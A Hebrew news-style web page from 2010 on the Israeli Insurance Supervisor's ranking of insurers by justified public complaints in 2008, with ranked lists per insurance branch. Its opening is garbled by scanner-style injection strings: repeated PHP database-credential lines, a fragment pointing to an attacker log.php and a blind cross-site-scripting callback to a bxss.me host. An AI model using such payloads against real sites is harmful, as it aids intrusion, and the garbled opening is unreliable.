$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> המפקח על הביטוח מדרג את החברות לפי תלונות ציבור המבוטחים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מדרג חברות ביטוח לפי תלונות ציבור המבוטחים

תאריך: 09/08/2010 14:27   מחבר: מערכת האתר

חברות הביטוח הן יעד מוכר לתלונות ציבור המבוטחים. אין מי מאתנו האזרחים שלא מבוטח באחת ויותר מפוליסות הביטוח שמנפקות החברות כגון:  רכב, דירה, בריאות, פנסיה, ציוד הנדסי, נסיעות לחו"ל ועוד. במסגרת ההתקשרות עם המבטח משלם המבוטח פרמיות בהתאם לשיעורים שנקבעו בפוליסה וכנגדן, נקבע סכום הכיסוי הביטוחי למקרה של תביעה בגין אירוע ביטוחי. אם וכאשר מוגשת תביעה על ידי מבוטח, מתברר, שהמבוטח נאלץ להיגרר לאורכו של נתיב ייסורים וסחבת שגורמים לו עוגמת נפש עד אשר יזכה לקבל את התמורה הכספית . חוסר שביעות רצון של מבוטחים רבים מאופן הטיפול בתביעתם הצודקת, לגבי דידם, על ידי חברות הביטוח, הוביל אותם להתלונן בפני המפקח על הביטוח ולבקש את התערבותו לבירור התלונה ומציאת פתרון הולם.

דוח המפקח על הביטוח

אחת לתקופה  מפרסם המפקח על הביטוח דוח מיוחד  המדרג את התייחסות חברות הביטוח ללקוחותיהן והטיפול בהם. הדירוג מתבסס על בדיקת התלונות הזורמות אל משרדי המפקח. בחודש ספטמבר 2009 פירסם המפקח הקודם, ידין ענתבי מדרג של חברות הביטוח והשוואה ביניהן על-פי תלונות הציבור כלפי החברות ב-2008. מהשוואת כל ענפי הביטוח עולה כי מבין חמש חברות הביטוח הגדולות בשוק, היחס הטוב ביותר ללקוח ניתן בחברת הביטוח הראל, והיחס הגרוע ביותר - בחברת הביטוח הפניקס. ככל שהדירוג שניתן לחברת ביטוח נמוך יותר, הוא מעיד שהחברה טיפלה טוב יותר בפניות הציבור.

לפי מה שהתפרסם באתר YNET המדרג מתבסס על תלונות שהוגשו למפקח ונמצאו מוצדקות, בשקלול גודלה של החברה. בהתאם לתלונות הציבור נערכו שני סוגי מדרגים: אחד המשותף לכל ענפי הביטוח, למעט ביטוח רכב חובה וחבויות, וכן מדרג מפוצל - לכל ענף ביטוח בנפרד, במספר ענפי ביטוח: ביטוח חיים, ביטוח רכב (רכוש) ודירות וביטוח בריאות (כולל תאונות אישיות).

עליה בשיעור המתלוננים

ב-2008 נתקבלו ביחידה לפניות הציבור שבאגף שוק ההון, הביטוח והחיסכון, 6,162 פניות (תלונות ובקשות לקבלת מידע) סך הכל - כ- 40% פניות יותר מאשר אלו שנתקבלו בשנת 2007.  בתחום הביטוח נתקבלו 3,837 פניות שהן 62% מסך הפניות, בתחום הגמל נתקבלו 1,595 פניות שהן 26% מסך הפניות, ובתחום הפנסיה 730 פניות, שהן 12% מסך הפניות. חלה עליה במספר הפניות שנתקבלו בכל התחומים, ובפרט בתחום הגמל - למעלה מ-400% במספר הפניות. 

ב-2008, המפקח על הביטוח טיפל ב-3,411 תלונות על הגופים המוסדיים. מסך כל התלונות שטופלו בשנה זו 1,249 תלונות היו מוצדקות, מתוכן 1,007 תלונות בתחום הביטוח. לפי המפקח, במקרה של תלונה מוצדקת הוא התערב וסייע למתלונן.

נתוני המדרג

מדרג חברות הביטוח בכל ענפי הביטוח לשנת 2008 שמספר התלונות עליהן נמוך מהממוצע הענפי ב-2008 (בסדר יורד)

1. שומרה

2. הראל

3. כלל בריאות

4. אליהו 

5. מגדל

6. איילון 

7. כלל

 מדרג חברות הביטוח בכל ענפי הביטוח שמספר התלונות עליהן היה גבוה מהממוצע הענפי ב-2008 (בסדר יורד)

1. ביטוח ישיר

2. דקלה

3. איי.אי.ג'י

4. שירביט

5. הכשרה ביטוח

6. הפניקס (הדר)

7. מנורה

8. ביטוח חקלאי

 מדרג חברות הביטוח בענף ביטוח חיים שמספר התלונות עליהן היה נמוך מהממוצע הענפי ב-2008 (בסדר יורד)

1. הראל

2. אליהו

3. מגדל

 מדרג חברות הביטוח בענף ביטוח חיים שמספר התלונות עליהן היה גבוה מהממוצע הענפי ב-2008 (בסדר יורד)

1. הכשרה ביטוח

2. מנורה

3. הפניקס

4. איילון

5. כלל

מדרג חברות הביטוח בענפי רכב (רכוש) ודירות שמספר התלונות עליהן היה נמוך מהממוצע הענפי (בסדר יורד) לשנת 2008 

1. שומרה

2. הראל

3. מנורה

4. אליהו

5. הכשרה ביטוח

6. איילון

7. הפניקס

 מדרג חברות הביטוח בענפי רכב (רכוש) ודירות שמספר התלונות עליהן היה גבוה מהממוצע הענפי (בסדר יורד) לשנת 2008

1. ביטוח ישיר

2. שירביט

3. ביטוח חקלאי

4. אי. איי. ג'י

5. כלל

6. מגדל

מדרג חברות הביטוח בענף ביטוח בריאות (כולל תאונות אישיות) שמספר התלונות עליהן היה נמוך מהממוצע הענפי (בסדר יורד) לשנת 2008 

1. מגדל

2. כלל

3. כלל בריאות

4. הראל

 מדרג חברות הביטוח בענף ביטוח בריאות (כולל תאונות אישיות) שמספר התלונות עליהן היה גבוה מהממוצע הענפי (בסדר יורד) לשנת 2008

1. דקלה

2. איי.אי.ג'י

3. איילון

4. הפניקס

5. מנורה

6. אליהו